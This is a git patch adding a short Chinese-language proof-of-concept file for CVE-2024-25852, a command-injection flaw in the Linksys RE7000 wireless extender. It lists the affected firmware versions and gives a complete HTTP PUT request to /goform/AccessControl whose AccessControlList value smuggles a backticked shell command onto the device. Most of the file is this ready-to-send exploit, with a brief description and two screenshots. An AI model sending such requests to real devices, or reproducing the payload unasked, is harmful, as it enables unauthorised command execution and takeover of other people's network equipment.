From b5697b05076a7b35956d95b600c4a3e7f7060471 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 19 Apr 2024 22:11:10 +0800 Subject: [PATCH] =?UTF-8?q?Create=20Linksys-RE7000=E6=97=A0=E7=BA=BF?= =?UTF-8?q?=E6=89=A9=E5=B1=95=E5=99=A8=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E(CVE-2024-25852).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...0无线扩展器命令执行漏洞(CVE-2024-25852).md | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852).md diff --git a/Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852).md b/Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852).md new file mode 100644 index 0000000..02661a7 --- /dev/null +++ b/Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852).md @@ -0,0 +1,29 @@ +## Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852) + +RE7000无线扩展器在访问控制功能点的“AccessControlList”参数中存在命令执行漏洞。攻击者可以利用该漏洞获取设备管理员权限。 + +## 受影响的版本: +``` +RE7000 v2.0.9、RE7000 v2.0.11、RE7000 v2.0.15 +``` + +## poc +``` +PUT /goform/AccessControl HTTP/1.1 +Host: ip +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Upgrade-Insecure-Requests: 1 +If-Modified-Since: Thu, 17 Sep 2020 11:24:58 GMT +If-None-Match: "14600429" +Content-Length: 81 + +{"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/1.txt`"} +``` + +![0ed3036d6115e4c5d0da3f117cbe9a0b](https://github.com/wy876/POC/assets/139549762/ed9ceedd-1757-48a5-a03b-3cd9111a684c) + +![93d68e665d74288cb215ebedd9d07040](https://github.com/wy876/POC/assets/139549762/2b99e04d-ca6a-4a8f-8332-cce7cadf4399)